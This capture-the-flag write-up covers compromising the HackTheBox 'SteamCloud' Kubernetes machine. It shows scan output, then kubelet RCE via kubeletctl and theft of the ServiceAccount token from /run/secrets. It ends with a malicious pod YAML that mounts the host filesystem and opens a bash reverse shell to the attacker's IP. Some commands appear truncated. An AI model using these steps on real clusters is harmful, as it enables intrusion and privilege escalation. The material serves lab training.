I initiated the enumeration phase by swiftly employing rustscan to scrutinize the target host for accessible ports and associated services. This swift scan yielded a multitude of open ports.
sudo rustscan -a -- -sC -sV -vv -oN steam_nmap
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCu4TNCZjLe74tZ0HyspkMaghndsvuXkZJa4lJBt9arqgkm6u2HI/RRdwbjE14au2u/YF89y23Q55iOGraA+9JjpyTzDPo3kxE/RisYzJaUDmzza+hqEeyTxXkZby9+DAhKm5UXs7M2CMDr3cwOPPQ96u/zUX0gDG3CfYw4fAi2TDGa6jU5KmGzIQz6SQR3Bv6IYLDwzNJ0nHNZ3jxSbFS3SsmTwK749GJLrv62wAf4uUL/Ihynl8cCG5aor6T0Fk44v/9ndfujznBvWaMYVPpf9B49XlD7OhXB5pCK2nPZrdze+ch6yhAM/vYrYA4sNk3IuFG3OCrDkVeUJn5sJKx5
| 256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHVj7iKnl8SWdGz6J4F3kvpZjM1Tim0iHlUnQByS8xJYnfwttLxVwGb+aaGbRhOJu4mq9y4crwFh50rC9mAEHWo=
| 256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXIZpU9XbtZ2zvx8rFEYTfGp+8JCJx5lSiRNEcqUFG8
80/tcp open http syn-ack ttl 63 nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
2379/tcp open ssl/etcd-client? syn-ack ttl 63
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:, IP Address:, IP Address:0:0:0:0:0:0:0:1
| Issuer: commonName=etcd-ca
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-11T06:22:41
| Not valid after: 2024-08-10T06:22:41
| MD5: a1d4 85a7 9d0f f668 2b53 6fd7 6f1c 34f2
| SHA-1: eb17 a123 768d d63d f114 ee9c 5f7b 3d7c 8864 8d7a
| AQCZI5G97GsQCFSfLVEpeiiwZWVkbFgi+GDqPya1yrsg9mVh0IXoKjxQeU8T9Xpn
| nA+5BBVM988syreSHBoRsho7MluaHoMXnxQMDv8WSjCxf7iZU6jnvdrKtb1J24uM
| CT9xKpZ/rNiKQ/cln///6ybEu86UPpnTm5CxiHpVY1I4a843dL9/SZQpdjyKBonF
| xJf8MFnIDdmgg9XsgwC2ev9D4wZIeGwMLuW1jhr4hDATfRsvDkhIyIT6EdhDrHtP
| wb3jZOp/5lVAEpCmCB8askqoqT/Kb4qlaIsVkM8K0V7ThLheBtCNImeHfL7c+FDw
| hkiG9w0BAQsFAAOCAQEAj60qR9qTCthm5qWInyvXvXFjwDiVmsLyhmvWZ+bG9Ogv
| H0ueiHynBswE/QtStE1cu6x2lsn8SP4AEbETKxRSayQZLzev6NebKHBQqTpx3II5
| 3yNWNFPWayiBcWta/qD1Agm63fQFvHblBqnzsouNJslvbtcJtGS6rzhCGED++6Ut
| 3A8f4y0+Ky3cAcOhJVbBZMDOw/0MDBxOKEULwAkQDiuv5aK8549/irpQNrDhAOgW
| Z8uySZWR/+pH9c62q8MLz/aCkcku7ol44jrTmJkzknPM205AHmVp+GD/sMDqOPUR
| 4IE5mgB7+cUmJv4gTu/7uoEtpv4QR/oxcp1ydInzZg==
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ h2
2380/tcp open ssl/etcd-server? syn-ack ttl 63
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:, IP Address:, IP Address:0:0:0:0:0:0:0:1
| Issuer: commonName=etcd-ca
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-11T06:22:41
| Not valid after: 2024-08-10T06:22:41
| MD5: 849e d938 8193 25a0 98f9 dcc0 d8e4 7cd8
| SHA-1: 1a40 aeca 4afa c719 2ec9 f284 7d29 c845 3425 cde0
| AQDDcpDk26X8rZf3A1LuoRtoLW/R3NoZyNKoMN0p0dcFksw1qSEGZiETgCaBZTDa
| d5Ifg6RZdszb16/LY+kkXlwn//wbnAdXOo3T1yUibIr8VHkR1aVmLh3nxidftiy+
| O63hrkhTKo7YnqxXo3+BP1aep/zR4yAptslx1Ti6M6vM3DbCAu67e/6VYO0ZmjUC
| KI9eokDWXTlIYjgNEBsk79QgZ5DkwsNveB1jGqnLh9inKQOCvNgNlo37GeFg9swD
| r7ctI0GM7VgshJkcIN5+roe24YImB9hMOdmtNCpeO7SPMzWS7oeOH9F7+uDSQCSH
| hkiG9w0BAQsFAAOCAQEAOPwY+MByp0Esq7jOYFaKM4y/sXrEfk/Fbrj2J5lIDP2E
| Fz14R4YgIJzb4Xsiid2cMKBjTwQAgsoR15C2apzXFloJfv7qgixUpRP7AgR+eBfU
| /vAqlXoGxRtB3DVkk+w1EDs/LlCtWh+jj+ndqdKnZTST9fVT4S4Y6mU3H9mNA4rY
| 6GzST4dtYKWwXu9ckcCPvdF0A0b+/78EaygMyHpcfvh39BTsOieQb07zT03VDmHi
| SvYZIO2V0MF+rBuZ65NvHQocpMMw0a2xiX0oCllJM+Obw5M7O1ikl1Nfql45D2A6
| gzMkKIof5tlX4XOtgIhQdOT0xkMDISayO5kXVvJQng==
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ h2
8443/tcp open ssl/https-alt syn-ack ttl 63
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 403 Forbidden
| Audit-Id: 9176c57a-73c0-4332-8316-ac5c6f3d7160
| Cache-Control: no-cache, private
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Kubernetes-Pf-Flowschema-Uid: a1e382d9-cd8e-42dc-a193-d1f949496589
| X-Kubernetes-Pf-Prioritylevel-Uid: 32560c2d-571b-4f54-ac21-d51a51b00c6b
| Date: Sat, 12 Aug 2023 16:27:34 GMT
| Content-Length: 212
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
| GetRequest:
| HTTP/1.0 403 Forbidden
| Audit-Id: 1342900d-0b99-44b5-9506-f5a00ad9bcb4
| Cache-Control: no-cache, private
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Kubernetes-Pf-Flowschema-Uid: a1e382d9-cd8e-42dc-a193-d1f949496589
| X-Kubernetes-Pf-Prioritylevel-Uid: 32560c2d-571b-4f54-ac21-d51a51b00c6b
| Date: Sat, 12 Aug 2023 16:27:33 GMT
| Content-Length: 185
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
| HTTPOptions:
| HTTP/1.0 403 Forbidden
| Audit-Id: 24a87ab8-c98a-4e81-9ce7-5a5c451bf6fb
| Cache-Control: no-cache, private
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Kubernetes-Pf-Flowschema-Uid: a1e382d9-cd8e-42dc-a193-d1f949496589
| X-Kubernetes-Pf-Prioritylevel-Uid: 32560c2d-571b-4f54-ac21-d51a51b00c6b
| Date: Sat, 12 Aug 2023 16:27:34 GMT
| Content-Length: 189
|_ {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
|_http-title: Site doesn't have a title (application/json).
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:, IP Address:, IP Address:, IP Address:
| Issuer: commonName=minikubeCA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-10T06:22:38
| Not valid after: 2026-08-10T06:22:38
| MD5: 6734 e1a7 4ee9 633d 784c a613 8fc7 021a
| SHA-1: 880e 2f5f d0af 8b3d 5cf4 d012 190a 9834 be66 4f6f
| ChMOc3lzdGVtOm1hc3RlcnMxETAPBgNVBAMTCG1pbmlrdWJlMIIBIjANBgkqhkiG
| GbhvwpNeXBB6t1gMI7o+Cd15tqp1YPC52u+tFZmLZ2LwgNPT4Yhn1MAHF9ZnDJoz
| nllEd30u1WGMhfVfeQA0xVHx/bCav8kTn9zQRP4fl/FLZV520caLnvTPBA2VcYlI
| 2v57jaSnSpamSmZwrqFtRDmQVuGjOcf7a/0nriadc4/xaP6+a4MQP+nNeRe63Uwy
| iwTD58BFMHsZW1TDIa14zgMGuoWnrfsA9h04HWhQTeyCetwTJdX9B1xtB0x1NJ/I
| KRzApbKal6UzHI0+jo8JTnTF+T5L/3QZony9o4+1zUnj2cr58QIDAQABo4IBHjCC
| MIG5BgNVHREEgbEwga6CCm1pbmlrdWJlQ0GCH2NvbnRyb2wtcGxhbmUubWluaWt1
| YmUuaW50ZXJuYWyCJGt1YmVybmV0ZXMuZGVmYXVsdC5zdmMuY2x1c3Rlci5sb2Nh
| bIIWa3ViZXJuZXRlcy5kZWZhdWx0LnN2Y4ISa3ViZXJuZXRlcy5kZWZhdWx0ggpr
| W1bXNZGmNeTQ1eP6QBlvl0mWKwmGoDDd7+AUwrryfElByF6oIGfNya13ENCMECm/
| EhSaHbA+dvCoci0Sh02xKbs0iFwUquf8acytQWQGcEFH8gFZ2iXlf6E3viwnvIZH
| 0TvfCQ6PbKafKEBdgZiNyrmJeWTKPJXo7aYMLpa+rj/eTjluzKIR5ePxD3Blx4le
| 5ogb56M0jPW4U1/8nxW8o4Y4p6WnRvaAtCSov3tJItQXPaPtEfoYpKqnzbnwVsXK
| whK7eF0uDiUy2UW37frntFLJbJjZ2jqvy9Ne3WX+Egg=
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| h2
|_ http/1.1
10249/tcp open http syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
10250/tcp open ssl/http syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| ssl-cert: Subject: commonName=steamcloud@1691734963
| Subject Alternative Name: DNS:steamcloud
| Issuer: commonName=steamcloud-ca@1691734962
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-11T05:22:42
| Not valid after: 2024-08-10T05:22:42
| MD5: 72fb 69b7 e3ce 0682 a8d9 2e71 19a1 4d79
| SHA-1: b5f9 f6df ca18 5b1c 0972 2fb5 e38f d480 fd8a 02ef
| 4KZcwjUoSndBzB9EYBtbyj0ANOrs2LgPo02Ht0699jrOzzQoqXJ9lA1z09Tah4Lo
| zlaPKf7FfjQo7uYrJc/0g7Ddn++3h3XQ5+8Bmg24x9gEikghrEiVQZfw1Ja0d0F8
| Zzw6JLKEOh8XPhgeMzq+g4HxMUpvnoHA4J7D1zBmOraOevmzwBsdl+sj2cBneu4N
| egkbCR/p71itbClDkAhpHrGQscMksHAvcpONcrEYSQd6tVkEJVXmKPOlfR6XIC1m
| dMLHcwEdjczj4TjC9/wQ5/+37b3L7Hujy6jD0xT3a/gBGBUmOuHNAgMBAAGjbTBr
| fgwa0lG1XgKKLlfErxr0k2av2HQb3iXtB5GR72HTUXmFHrUuSVwprU7yMojwbg23
| ObtnJ4PAvDdo4osqSdRw+vHyk1oVV28pcvNVIdmklQT4hRbEyTzCnFR2O3Uy/AHL
| 9E0AQuA3cXzJ3AIpJ19ccTgDWVs9oBEA/shXXk37KgmuLN8usb+XMJrxNZaN5hgK
| 3lhXzF9N8z+5tMyis2W4fwFVKk0TTKh8P5nzhoBoB3LjjMCDB1I3mpefdTfVydGa
| x8LceVV7id7whlKxVLZZ8UcXb7Ik+IleLyITa/bzFDaJy/5EUUgLNB8Y1xQ3DWw=
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| h2
|_ http/1.1
10256/tcp open http syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
The scan outcomes unveiled a significant discovery – the target host was hosting a functioning Kubernetes cluster.
Subsequently, I focused my attention on the HTTP services running on port 80, yet this examination did not yield any notable findings. My pursuit then extended to port 8443, where I came across the following web page:
Upon confirming the presence of a running Kubernetes cluster, the need to perform comprehensive Kubernetes enumeration became paramount. In my quest for effective enumeration techniques and exploitation strategies, I turned to the invaluable resource, "Hacktrickz".
While navigating Hacktrickz, I sought insights on Kubernetes, although I couldn't locate a specific topic addressing this. Fortunately, by referencing write-ups for this specific machine, I came across a dedicated section titled "Pentesting Kubernetes," which, regrettably, was no longer available. However, leveraging the power of the web-archive, I accessed the older version of Hacktrickz, uncovering the Pentesting Kubernetes section.
Following the guidance laid out in the section titled Pentesting from Outside, I embarked on a structured exploration.
Commencing with port 8443, I diligently executed the prescribed commands, only to find no discernible deviation from the earlier observations.
Subsequently, my focus shifted to port 10250, where I executed commands to retrieve metrics, assess pods, and inspect running pods, yielding insightful responses:
curl -k https://steamcloud.htb:10250/metrics #to check for the metrics
curl -k https://steamcloud.htb:10250/pods
curl -k https://steamcloud.htb:10250/pods | jq | head #jq = json query
curl -k https://steamcloud.htb:10250/pods | jq '.items[]' #to check for all the active pods
Continuing my exploration, I turned to a powerful tool named "kubeletctl," developed by CyberArk, for further enumeration within the Kubernetes environment.
Starting with a review of the active pods:
kubeletctl pods -s #-s=server
My inquiry extended to running pods, revealing their attributes in JSON format:
kubeletctl runningpods -s
Employing a targeted JSON query, I distilled the results to essential details:
kubeletctl runningpods -s | jq -c '.items[].metadata | [.name, .namespace]'
Diving deeper, I leveraged kubeletctl to scrutinize the pods for Remote Code Execution (RCE) vulnerabilities:
kubeletctl scan rce --server
My analysis highlighted the susceptibility of "nginx" and "kube-proxy-6vj5n."
Drawing inspiration from Hacktrickz and armed with the insights from kubeletctl, I capitalized on the RCE vulnerability to attain root-level access:
kubeletctl exec /bin/bash -p nginx -c nginx -s #used the vulnerable pod & container as "nginx"
Seizing control as the root user, I successfully retrieved the user flag. (pwn3d! 🙂)
With the user flag secured and root shell achieved, I continued my journey by manually exploring the environment and discovered that I was operating within a Dockerized setup.
Delving into deeper manual enumeration, I deduced that I was within a Docker environment. This realization prompted me to research further and led me to the fascinating world of ServiceAccount tokens within Kubernetes.
Referring to HackTrickz, I learned about ServiceAccount tokens, which are used to provide identities to processes running within pods. Every service account has a secret associated with it, containing a JSON Web Token (JWT) known as a bearer token.
I identified three locations where these ServiceAccount secrets might be stored:
- /run/secrets/
- /var/run/secrets/
- /secrets/
I found three crucial files inside this directory: "/run/secrets/"
- ca.crt: It's the ca certificate to check kubernetes communications
- namespace: It indicates the current namespace
- token: It contains the service token of the current pod.
Now, with the ca.crt and the token, I can authenticate to the cluster which is running on 8443 on which I wasn't able to authenticate earlier.
I leveraged this newfound knowledge to extract the ca.crt and token to my local Kali host:
kubeletctl exec 'cat /run/secrets/' -p nginx -c nginx -s > ca.crt
export token=$(kubeletctl exec 'cat /run/secrets/' -p nginx -c nginx -s #saved this in an environment variable to reduce copy paste efforts.
After having all the necessary file saved into my attacker host, I downloaded another tool to facilitate authentication to the Kubernetes API:
curl -LO "$(curl -L -s" #to download kubectl
Armed with kubectl, ca.crt, and the token, I finally succeeded in authenticating to the Kubernetes API, accessible on port 8443:
kubectl --server --certificate-authority=ca.crt --token=$token get pod #listed the pods
While I was able to list pods, my privileges were still restricted when attempting to fetch information about namespaces:
kubectl --server --certificate-authority=ca.crt --token=$token get namespaces
I employed the "auth can-i" command to ascertain my capabilities, revealing that I could create pods within the container:
kubectl --server --certificate-authority=ca.crt --token=$token auth can-i --list
In the list on the 3rd line I observed that I can create pods inside the container.
Once I confirmed that I can create pods inside the container I extraced further information about the nginx pod:
kubectl get pod nginx -o yaml --server --certificate-authority=ca.crt --token=$token
From the results we can see that namespace is "default" & "image= nginx:1.14.2".
Using this info & taking refrence from 0xdf writeup, I crafted a YAML file inspired by 0xdf's writeup to achieve a reverse shell:
apiVersion: v1
kind: Pod
name: kill3r
namespace: default
- name: kill3r
image: nginx:1.14.2
command: ["/bin/bash"]
args: ["-c", "/bin/bash -i >& /dev/tcp/<my-ip>/8443 0>&1"]
- mountPath: /mnt
name: hostfs
- name: hostfs
path: /
automountServiceAccountToken: true
hostNetwork: true
After the creation of this yaml file I used this to create the pod. This Pod will mount / from the host machine into /mnt inside the container (we could have chosen another directory).
kubectl --server --certificate-authority=ca.crt --token=$token apply -f kill3r.yaml
With the pod established, I promptly gained a reverse shell:
Taking advantage of the mounted volume at "/mnt," I navigated to the directory, escaped the container, and ultimately secured the coveted root flag. (pwn3d! 🙂)